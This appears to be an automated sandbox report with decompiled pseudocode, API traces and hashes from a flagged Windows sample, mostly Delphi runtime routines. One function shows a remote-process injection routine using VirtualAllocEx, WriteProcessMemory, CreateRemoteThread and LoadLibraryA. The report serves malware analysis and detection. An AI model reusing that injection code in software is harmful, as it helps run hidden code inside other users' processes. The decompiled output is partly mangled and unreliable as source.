						_t180 =  *((intOrPtr*)(_t180 + 4));
						continue;
					} else {
						goto L5;
					}
					do {
						L5:
						_t194 =  *(_t131 - 4);
						__eflags = _t194 & 0x00000001;
						if((_t194 & 0x00000001) == 0) {
							__eflags = _t194 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t194 & 0xfffffff0) - 4;
									_t126 = E027223BC(_t131);
									__eflags = _t126;
									if(_t126 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t198 + _v112652 * 4 - 0x1f828)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E02722414(_t131, __eflags, _t198);
							}
						}
						_t79 = E02722054(_t131);
						_t131 = _t79;
						__eflags = _t131;
					} while (_t131 != 0);
					goto L12;
				}
				_t132 =  *0x27437a8; // 0x7f9e0000
				while(_t132 != 0x27437a4 && _v112652 < 0x1000) {
					_t79 = E027223BC(_t132 + 0x10);
					__eflags = _t79;
					if(_t79 == 0) {
						_v112645 = 0;
						_t79 = _v112652;
						 *((intOrPtr*)(_t198 + _t79 * 4 - 0x1f828)) = ( *(_t132 + 0xc) & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t132 =  *((intOrPtr*)(_t132 + 4));
				}
				if(_v112645 != 0) {
					L49:
					return _t79;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t134 = E02722210(0x28,  &_v161836);
				_v112660 = 0x37;
				_v112680 = 0x2740046;
				_v112684 =  &_v110600;
				do {
					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t182 = 0xff;
					_t188 = _v112684;
					while(_t134 <=  &_v131117) {
						if( *_t188 > 0) {
							if(_v112653 == 0) {
								_t134 = E02722210(0x27, _t134);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t134 = 0x2c;
								_t139 = _t134 + 1;
								 *_t139 = 0x20;
								_t140 = _t139 + 1;
								__eflags = _t139 + 1;
							} else {
								 *_t134 = 0xd;
								 *((char*)(_t134 + 1)) = 0xa;
								_t147 = E027220F4(_v112668 + 1, _t134 + 2);
								 *_t147 = 0x20;
								_t148 = _t147 + 1;
								 *_t148 = 0x2d;
								 *((char*)(_t148 + 1)) = 0x20;
								_t140 = E02722210(8, E027220F4(_v112672, _t148 + 2));
								_v112654 = 1;
							}
							_t214 = _t182 - 1;
							if(_t214 < 0) {
								_t141 = E02722210(7, _t140);
							} else {
								if(_t214 == 0) {
									_t141 = E02722210(6, _t140);
								} else {
									E02723BD8( *((intOrPtr*)(_t188 - 4)),  &_v162092);
									_t141 = E02722210(_v162092 & 0x000000ff, _t140);
								}
							}
							 *_t141 = 0x20;
							_t142 = _t141 + 1;
							 *_t142 = 0x78;
							 *((char*)(_t142 + 1)) = 0x20;
							_t134 = E027220F4( *_t188, _t142 + 2);
						}
						_t182 = _t182 - 1;
						_t188 = _t188 - 8;
						if(_t182 != 0xffffffff) {
							continue;
						} else {
							goto L38;
						}
					}
					L38:
					_v112668 = _v112672;
					_v112684 = _v112684 + 0x800;
					_v112680 =  &(_v112680[0x10]);
					_t60 =  &_v112660;
					 *_t60 = _v112660 - 1;
				} while ( *_t60 != 0);
				if(_v112652 <= 0) {
					L48:
					E02722210(3, _t134);
					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
					goto L49;
				}
				if(_v112653 != 0) {
					 *_t134 = 0xd;
					_t136 = _t134 + 1;
					 *_t136 = 0xa;
					_t137 = _t136 + 1;
					 *_t137 = 0xd;
					_t138 = _t137 + 1;
					 *_t138 = 0xa;
					_t134 = _t138 + 1;
				}
				_t134 = E02722210(0x3c, _t134);
				_t184 = _v112652 - 1;
				if(_t184 >= 0) {
					_t185 = _t184 + 1;
					_v112676 = 0;
					_t189 =  &_v129068;
					L44:
					L44:
					if(_v112676 != 0) {
						 *_t134 = 0x2c;
						_t135 = _t134 + 1;
						 *_t135 = 0x20;
						_t134 = _t135 + 1;
					}
					_t134 = E027220F4( *_t189, _t134);
					if(_t134 >  &_v131117) {
						goto L48;
					}
					_v112676 =  &(_v112676->i);
					_t189 = _t189 + 4;
					_t185 = _t185 - 1;
					if(_t185 != 0) {
						goto L44;
					}
				}
				L2:
				_t200 = _t200 + 0xfffff004;
				_push(_t73);
				_t73 = _t73 - 1;
				if(_t73 != 0) {
					goto L2;
				} else {
					E02723518( &_v112644, 0x1b800);
					E02723518( &_v129068, 0x4000);
					_t79 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t180 =  *0x2741704; // 0x4930000
					goto L13;
				}
			}

0x02722561
0x02722563
0x02722564
0x02722564
0x00000000
0x0272263f
0x027225bf
0x027225c4
0x027225c6
0x027225c8
0x0272263c
0x0272263c
0x00000000
0x00000000
0x00000000
0x00000000
0x027225ca
0x027225ca
0x027225cf
0x027225d1
0x027225d7
0x027225d9
0x027225df
0x027225ec
0x027225f6
0x027225fe
0x02722606
0x0272260b
0x0272260d
0x0272260f
0x02722622
0x02722629
0x02722629
0x02722629
0x02722629
0x0272260d
0x027225e1
0x027225e4
0x027225e9
0x027225df
0x02722631
0x02722636
0x02722638
0x02722638
0x00000000
0x027225ca
0x0272264b
0x0272268a
0x02722658
0x0272265d
0x0272265f
0x02722661
0x02722674
0x0272267a
0x02722681
0x02722681
0x02722681
0x02722681
0x02722687
0x02722687
0x027226a5
0x02722903
0x02722909
0x02722909
0x027226ab
0x027226b4
0x027226cf
0x027226d1
0x027226db
0x027226eb
0x027226f1
0x027226fd
0x02722703
0x0272270a
0x02722715
0x02722717
0x02722728
0x02722735
0x02722748
0x0272274a
0x0272274a
0x02722758
0x027227a9
0x027227ac
0x027227ad
0x027227b0
0x027227b0
0x0272275a
0x0272275a
0x0272275e
0x02722770
0x02722772
0x02722775
0x02722776
0x0272277a
0x0272279e
0x027227a0
0x027227a0
0x027227b3
0x027227b6
0x027227cd
0x027227b8
0x027227b8
0x027227e2
0x027227ba
0x027227ef
0x02722808
0x02722808
0x027227b8
0x0272280a
0x0272280d
0x0272280e
0x02722812
0x0272281f
0x0272281f
0x02722821
0x02722822
0x02722828
0x00000000
0x00000000
0x00000000
0x00000000
0x02722828
0x0272282e
0x02722834
0x0272283a
0x02722844
0x0272284b
0x0272284b
0x0272284b
0x0272285e
0x027228da
0x027228e6
0x027228fe
0x00000000
0x027228fe
0x02722867
0x02722869
0x0272286c
0x0272286d
0x02722870
0x02722871
0x02722874
0x02722875
0x02722878
0x02722878
0x0272288a
0x02722892
0x02722895
0x02722897
0x02722898
0x027228a2
0x00000000
0x027228a8
0x027228af
0x027228b1
0x027228b4
0x027228b5
0x027228b8
0x027228b8
0x027228c2
0x027228cc
0x00000000
0x00000000
0x027228ce
0x027228d4
0x027228d7
0x027228d8
0x00000000
0x00000000
0x027228d8
0x02722569
0x02722569
0x0272256f
0x02722570
0x02722571
0x00000000
0x02722573
0x0272258c
0x0272259e
0x027225a3
0x027225a5
0x027225ab
0x027225b2
0x00000000
0x027225b2

Strings

An unexpected memory leak has occurred. , xrefs: 027226C0
, xrefs: 02722844
Unexpected Memory Leak, xrefs: 027228F0
bytes: , xrefs: 0272278D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02722879
The unexpected small block leaks are:, xrefs: 02722737
7, xrefs: 027226D1

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 71c48a0c50d61b76e91bdf78869875f44eb06d05d8c8ef456d524bb255ebb122
Instruction ID: 21d409b7adc5897316b0837701bd2df06bb4ae12edea25d2be07bacf8365053f
Opcode Fuzzy Hash: 71c48a0c50d61b76e91bdf78869875f44eb06d05d8c8ef456d524bb255ebb122
Instruction Fuzzy Hash: 5C718530A042B88EDB22962CC884BD9B6E5EB09714F5441E5D989E7243DB75CAC9CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02735BC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E02735BC0(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				void* __ecx;
				void* _t22;
				void* _t27;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t40;

				_push(_t27);
				_push(__ebx);
				_push(__esi);
				_v8 = __edx;
				_t37 = __eax;
				E02724D54(_v8);
				_push(_t40);
				_push(0x2735c73);
				_push( *[fs:eax]);
				 *[fs:eax] = _t40;
				 *0x27444dc = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
				 *0x27444d4 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
				 *0x27444d8 = E02735A40(_t37, 0, _t27, E02724D64(_v8), __edi, _t37);
				 *0x27444e0 = E02735B0C(_t37, 0x27444d4, E02735B8C, 0, 0xc);
				if( *0x27444e0 != 0) {
					_t22 =  *0x27444e0; // 0x0
					CloseHandle(_t22);
				}
				_pop(_t34);
				 *[fs:eax] = _t34;
				_push(0x2735c7a);
				return E027248A0( &_v8);
			}

0x02735bc3
0x02735bc4
0x02735bc5
0x02735bc6
0x02735bc9
0x02735bce
0x02735bd5
0x02735bd6
0x02735bdb
0x02735bde
0x02735bf8
0x02735c12
0x02735c28
0x02735c42
0x02735c4e
0x02735c50
0x02735c56
0x02735c5b
0x02735c5f
0x02735c62
0x02735c65
0x02735c72

APIs

GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,02735C73), ref: 02735BED
GetProcAddress.KERNEL32(00000000,kernel32), ref: 02735BF3
GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02735C73), ref: 02735C07
GetProcAddress.KERNEL32(00000000,kernel32), ref: 02735C0D

Part of subcall function 02735A40: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,02735AC6,?,?,?,?,00000000,00000000,00000000), ref: 02735A80
Part of subcall function 02735A40: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,00000000,02735AC6), ref: 02735AA6

Part of subcall function 02735B0C: CreateRemoteThread.KERNEL32(?,00000000,00000000,047E0000,04740000,00000000,02744534), ref: 02735B58
Part of subcall function 02735B0C: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02735B68
Part of subcall function 02735B0C: ReadProcessMemory.KERNEL32(?,04740000,?,?,02744530,00000000,000000FF), ref: 02735B7E

CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02735C73), ref: 02735C56

Strings

LoadLibraryA, xrefs: 02735BFD
Sleep, xrefs: 02735BE3
kernel32, xrefs: 02735BE8, 02735C02

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
String ID: LoadLibraryA$Sleep$kernel32
API String ID: 3487503967-1813742806
Opcode ID: 5c1f1fe6ec2d662af1d08c66f44657a19c53bf912e56b34b2b946e45cbcaf017
Instruction ID: 367e719038812389def98b0ef21b474cc690bc87651606cc4288c910124d1dcf
Opcode Fuzzy Hash: 5c1f1fe6ec2d662af1d08c66f44657a19c53bf912e56b34b2b946e45cbcaf017
Instruction Fuzzy Hash: C911A1F4A80324AEE703EBA8DC6AA5E3BE9EB09704BD04476E0109B601DB705D14AF54

Uniqueness

Uniqueness Score: -1.00%

Function 0272BF6C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0272BF6C(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x272c237);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0272BEA8();
				E0272AA6C(__ebx, __edi, __esi);
				_t196 =  *0x27438d0;
				if( *0x27438d0 != 0) {
					E0272AC44(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0272A9B8(_t43, 0, 0x14,  &_v20);
				E027248F4(0x2743804, _v20);
				E0272A9B8(_t43, 0x272c24c, 0x1b,  &_v24);
				 *0x2743808 = E02727DC4(0x272c24c, 0, _t196);
				E0272A9B8(_t132, 0x272c24c, 0x1c,  &_v28);
				 *0x2743809 = E02727DC4(0x272c24c, 0, _t196);
				 *0x274380a = E0272AA04(_t132, 0x2c, 0xf);
				 *0x274380b = E0272AA04(_t132, 0x2e, 0xe);
				E0272A9B8(_t132, 0x272c24c, 0x19,  &_v32);
				 *0x274380c = E02727DC4(0x272c24c, 0, _t196);
				 *0x274380d = E0272AA04(_t132, 0x2f, 0x1d);
				E0272A9B8(_t132, "m/d/yy", 0x1f,  &_v40);
				E0272ACF4(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E027248F4(0x2743810, _v36);
				E0272A9B8(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0272ACF4(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E027248F4(0x2743814, _v44);
				 *0x2743818 = E0272AA04(_t132, 0x3a, 0x1e);
				E0272A9B8(_t132, 0x272c280, 0x28,  &_v52);
				E027248F4(0x274381c, _v52);
				E0272A9B8(_t132, 0x272c28c, 0x29,  &_v56);
				E027248F4(0x2743820, _v56);
				E027248A0( &_v12);
				E027248A0( &_v16);
				E0272A9B8(_t132, 0x272c24c, 0x25,  &_v60);
				_t104 = E02727DC4(0x272c24c, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E02724938( &_v8, 0x272c2a4);
				} else {
					E02724938( &_v8, 0x272c298);
				}
				E0272A9B8(_t132, 0x272c24c, 0x23,  &_v64);
				_t111 = E02727DC4(0x272c24c, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0272A9B8(_t132, 0x272c24c, 0x1005,  &_v68);
					if(E02727DC4(0x272c24c, 0, _t198) != 0) {
						E02724938( &_v12, 0x272c2c0);
					} else {
						E02724938( &_v16, 0x272c2b0);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E02724C24();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E02724C24();
				 *0x27438d2 = E0272AA04(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0272C23E);
				return E027248C4( &_v68, 0x10);
			}

0x0272bf6c
0x0272bf6c
0x0272bf6d
0x0272bf6f
0x0272bf74
0x0272bf74
0x0272bf76
0x0272bf78
0x0272bf78
0x0272bf7b
0x0272bf7e
0x0272bf7f
0x0272bf84
0x0272bf87
0x0272bf8a
0x0272bf8f
0x0272bf94
0x0272bf9b
0x0272bf9d
0x0272bf9d
0x0272bfa7
0x0272bfb6
0x0272bfc3
0x0272bfd8
0x0272bfe7
0x0272bffc
0x0272c00b
0x0272c01e
0x0272c031
0x0272c046
0x0272c055
0x0272c068
0x0272c07d
0x0272c088
0x0272c095
0x0272c0aa
0x0272c0b5
0x0272c0c2
0x0272c0d5
0x0272c0ea
0x0272c0f7
0x0272c10c
0x0272c119
0x0272c121
0x0272c129
0x0272c13e
0x0272c148
0x0272c14d
0x0272c14f
0x0272c168
0x0272c151
0x0272c159
0x0272c159
0x0272c17d
0x0272c187
0x0272c18c
0x0272c18e
0x0272c1a0
0x0272c1b1
0x0272c1ca
0x0272c1b3
0x0272c1bb
0x0272c1bb
0x0272c1b1
0x0272c1cf
0x0272c1d2
0x0272c1d5
0x0272c1da
0x0272c1e7
0x0272c1ec
0x0272c1ef
0x0272c1f2
0x0272c1f7
0x0272c204
0x0272c217
0x0272c21e
0x0272c221
0x0272c224
0x0272c236

APIs

GetThreadLocale.KERNEL32(00000000,0272C237,?,?,00000000,00000000), ref: 0272BFA2

Part of subcall function 0272A9B8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0272A9D6

Strings

m/d/yy, xrefs: 0272C071
:mm:ss, xrefs: 0272C1F2
mmmm d, yyyy, xrefs: 0272C09E
AMPM, xrefs: 0272C1B6
:mm, xrefs: 0272C1D5
AMPM , xrefs: 0272C1C5

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 19b3d38ed4665674cdcd5cfe408b3983827e950ad3ce4eedcd1f7c9debd8847c
Instruction ID: 085df19cb449d6a80147d70e646b7fddf29756cc3141088683d57a20df410b62
Opcode Fuzzy Hash: 19b3d38ed4665674cdcd5cfe408b3983827e950ad3ce4eedcd1f7c9debd8847c
Instruction Fuzzy Hash: 2B6157307002685BDB06EBF8D85569FB7FBEB59700F62947AE141AB345CE34D90D8B60

Uniqueness

Uniqueness Score: -1.00%

Function 0272E5DC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0272E5DC(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0272E21C(0x80070057);
				}
				_t47 =  *_t91 & 0x0000ffff;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0272CFDC();
					return E0272E21C(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 = _t91[4];
					} else {
						_v792 =  *(_t91[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0272D434();
						_t113 = _t54;
						if(_t113 == 0) {
							E0272DF74(_t100);
						}
						E0272E534(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0272E550(_v788 - 1, _t115) != 0) {
								L0272D44C();
								E0272E21C(_v792);
								L0272D44C();
								E0272E21C( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0272E580(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0272D43C();
							E0272E21C(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0272D444();
							E0272E21C(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}

0x0272e5dc
0x0272e5e8
0x0272e5ee
0x0272e5f0
0x0272e5fa
0x0272e601
0x0272e601
0x0272e606
0x0272e614
0x0272e78d
0x0272e794
0x0272e795
0x00000000
0x0272e61a
0x0272e61d
0x0272e62f
0x0272e61f
0x0272e624
0x0272e624
0x0272e63e
0x0272e64a
0x0272e64d
0x0272e6ba
0x0272e6c0
0x0272e6c1
0x0272e6c7
0x0272e6c8
0x0272e6ca
0x0272e6cf
0x0272e6d3
0x0272e6d5
0x0272e6d5
0x0272e6e0
0x0272e6eb
0x0272e6f6
0x0272e6ff
0x0272e702
0x0272e71e
0x0272e725
0x0272e730
0x0272e747
0x0272e74c
0x0272e760
0x0272e765
0x0272e778
0x0272e778
0x0272e781
0x0272e704
0x0272e704
0x0272e705
0x0272e70b
0x0272e711
0x0272e713
0x0272e715
0x0272e718
0x0272e71b
0x0272e71b
0x0272e71e
0x00000000
0x00000000
0x00000000
0x0272e71e
0x0272e64f
0x0272e64f
0x0272e650
0x0272e652
0x0272e658
0x0272e65a
0x0272e669
0x0272e66a
0x0272e674
0x0272e675
0x0272e67a
0x0272e685
0x0272e686
0x0272e690
0x0272e691
0x0272e696
0x0272e6b1
0x0272e6b3
0x0272e6b4
0x0272e6b7
0x0272e6b7
0x00000000
0x0272e658
0x0272e64d

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0272E675
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0272E691
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0272E6CA
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0272E747
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0272E760
VariantCopy.OLEAUT32(?), ref: 0272E795

Strings

, xrefs: 0272E5F6

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
Instruction ID: 1d81180a491e90f2847a3e3893d2b53ac8a6ece5b6aab8f6aee8ba2375acfd4e
Opcode Fuzzy Hash: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
Instruction Fuzzy Hash: D151D8759006399BCB26DB58CC84BD9B3FDAF48300F4451E5E609EB212DB70AF898F65

Uniqueness

Uniqueness Score: -1.00%

Function 02724720 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E02724720(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x2741044 == 0) {
					if( *0x2740030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x2741218 == 0xd7b2 &&  *0x2741220 > 0) {
						 *0x2741230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E027247A8, 2,  &_v4, 0);
				}
			}

0x02724728
0x02724788
0x02724798
0x02724798
0x0272479e
0x0272472a
0x02724733
0x02724743
0x02724743
0x0272475f
0x02724780
0x02724780

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027247E7,?,?,027437C0,?,?,027407CC,027267FD,0273F2B5), ref: 02724759
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027247E7,?,?,027437C0,?,?,027407CC,027267FD,0273F2B5), ref: 0272475F
GetStdHandle.KERNEL32(000000F5,027247A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027247E7,?,?,027437C0), ref: 02724774
WriteFile.KERNEL32(00000000,000000F5,027247A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027247E7,?,?), ref: 0272477A
MessageBoxA.USER32 ref: 02724798

Strings

Error, xrefs: 0272478C
Runtime error at 00000000, xrefs: 02724752, 02724791

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: adf644640dd1623b347794ab1bb4437389b665a74268a873190a36ca7399d86b
Instruction ID: 870d81d322866e29b19944f1ee75955bd58ba18736a4dfc37b4751bd6e5e883d
Opcode Fuzzy Hash: adf644640dd1623b347794ab1bb4437389b665a74268a873190a36ca7399d86b
Instruction Fuzzy Hash: 43F02BB1BC037539FB12B2609C49F5936AC6701F11FD08716F62CE50C187B020C88A26

Uniqueness

Uniqueness Score: -1.00%

Function 02722EC8 Relevance: 11.4, APIs: 9, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02722EC8(CHAR* __eax, void* __ecx, intOrPtr* __edx) {
				CHAR* _t23;
				CHAR* _t24;
				CHAR* _t29;
				CHAR* _t30;
				CHAR* _t31;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t36;
				CHAR** _t37;

				_t33 = __edx;
				_t23 = __eax;
				L2:
				while(1) {
					if( *_t23 != 0 &&  *_t23 <= 0x20) {
						_t23 = CharNextA(_t23);
						continue;
					}
					if( *_t23 != 0x22 || _t23[1] != 0x22) {
						_t35 = 0;
						 *_t37 = _t23;
						while( *_t23 > 0x20) {
							if( *_t23 != 0x22) {
								_t29 = CharNextA(_t23);
								_t35 = _t35 + _t29 - _t23;
								_t23 = _t29;
								continue;
							}
							_t23 = CharNextA(_t23);
							while( *_t23 != 0 &&  *_t23 != 0x22) {
								_t32 = CharNextA(_t23);
								_t35 = _t35 + _t32 - _t23;
								_t23 = _t32;
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						E02724F90(_t33, _t35);
						_t24 =  *_t37;
						_t36 =  *_t33;
						_t34 = 0;
						while( *_t24 > 0x20) {
							if( *_t24 != 0x22) {
								_t30 = CharNextA(_t24);
								if(_t30 <= _t24) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
									_t24 =  &(_t24[1]);
									_t34 = _t34 + 1;
								} while (_t30 > _t24);
								continue;
							}
							_t24 = CharNextA(_t24);
							while( *_t24 != 0 &&  *_t24 != 0x22) {
								_t31 = CharNextA(_t24);
								if(_t31 <= _t24) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
									_t24 =  &(_t24[1]);
									_t34 = _t34 + 1;
								} while (_t31 > _t24);
							}
							if( *_t24 != 0) {
								_t24 = CharNextA(_t24);
							}
						}
						return _t24;
					} else {
						_t23 =  &(_t23[2]);
						continue;
					}
				}
			}

0x02722ecd
0x02722ecf
0x00000000
0x02722edb
0x02722ede
0x02722ed9
0x00000000
0x02722ed9
0x02722ee8
0x02722ef5
0x02722ef7
0x02722f44
0x02722eff
0x02722f3a
0x02722f40
0x02722f42
0x00000000
0x02722f42
0x02722f07
0x02722f1b
0x02722f11
0x02722f17
0x02722f19
0x02722f19
0x02722f28
0x02722f30
0x02722f30
0x02722f28
0x02722f4d
0x02722f52
0x02722f55
0x02722f57
0x02722fb5
0x02722f5e
0x02722fa2
0x02722fa6
0x00000000
0x00000000
0x00000000
0x00000000
0x02722fa8
0x02722fa8
0x02722fab
0x02722faf
